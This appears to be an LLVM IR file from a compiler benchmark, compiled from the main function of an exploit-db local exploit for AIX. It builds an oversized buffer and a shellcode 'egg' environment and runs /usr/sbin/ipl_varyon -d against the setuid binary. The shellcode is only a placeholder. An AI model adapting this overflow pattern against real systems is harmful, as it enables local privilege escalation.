; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/aix/local/extr_1045.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/aix/local/extr_1045.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@BUFFERSIZE = common dso_local global i32 0, align 4
@EGGSIZE = common dso_local global i32 0, align 4
@shellcode_binsh = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [21 x i8] c"/usr/sbin/ipl_varyon\00", align 1
@.str.1 = private unnamed_addr constant [3 x i8] c"-d\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  %2 = alloca i8*, align 8
  %3 = alloca i8*, align 8
  %4 = alloca [3 x i8*], align 16
  %5 = alloca [2 x i8*], align 16
  store i32 0, i32* %1, align 4
  %6 = load i32, i32* @BUFFERSIZE, align 4
  %7 = call i64 @malloc(i32 %6)
  %8 = inttoptr i64 %7 to i8*
  store i8* %8, i8** %2, align 8
  %9 = load i32, i32* @EGGSIZE, align 4
  %10 = call i64 @malloc(i32 %9)
  %11 = inttoptr i64 %10 to i8*
  store i8* %11, i8** %3, align 8
  %12 = load i8*, i8** %3, align 8
  %13 = load i8*, i8** %2, align 8
  %14 = load i32, i32* @EGGSIZE, align 4
  %15 = load i32, i32* @BUFFERSIZE, align 4
  %16 = call i32 @cex_load_environment(i8* %12, i8* %13, i8* bitcast (i32* @shellcode_binsh to i8*), i32 %14, i32 %15)
  %17 = getelementptr inbounds [3 x i8*], [3 x i8*]* %4, i64 0, i64 0
  store i8* getelementptr inbounds ([21 x i8], [21 x i8]* @.str, i64 0, i64 0), i8** %17, align 16
  %18 = getelementptr inbounds [3 x i8*], [3 x i8*]* %4, i64 0, i64 1
  store i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.1, i64 0, i64 0), i8** %18, align 8
  %19 = load i8*, i8** %2, align 8
  %20 = getelementptr inbounds [3 x i8*], [3 x i8*]* %4, i64 0, i64 2
  store i8* %19, i8** %20, align 16
  %21 = getelementptr inbounds [3 x i8*], [3 x i8*]* %4, i64 0, i64 3
  store i8* null, i8** %21, align 8
  %22 = load i8*, i8** %3, align 8
  %23 = getelementptr inbounds [2 x i8*], [2 x i8*]* %5, i64 0, i64 0
  store i8* %22, i8** %23, align 16
  %24 = getelementptr inbounds [2 x i8*], [2 x i8*]* %5, i64 0, i64 1
  store i8* null, i8** %24, align 8
  %25 = getelementptr inbounds [3 x i8*], [3 x i8*]* %4, i64 0, i64 0
  %26 = getelementptr inbounds [2 x i8*], [2 x i8*]* %5, i64 0, i64 0
  %27 = call i32 @execve(i8* getelementptr inbounds ([21 x i8], [21 x i8]* @.str, i64 0, i64 0), i8** %25, i8** %26)
  ret i32 0
}

declare dso_local i64 @malloc(i32) #1

declare dso_local i32 @cex_load_environment(i8*, i8*, i8*, i32, i32) #1

declare dso_local i32 @execve(i8*, i8**, i8**) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
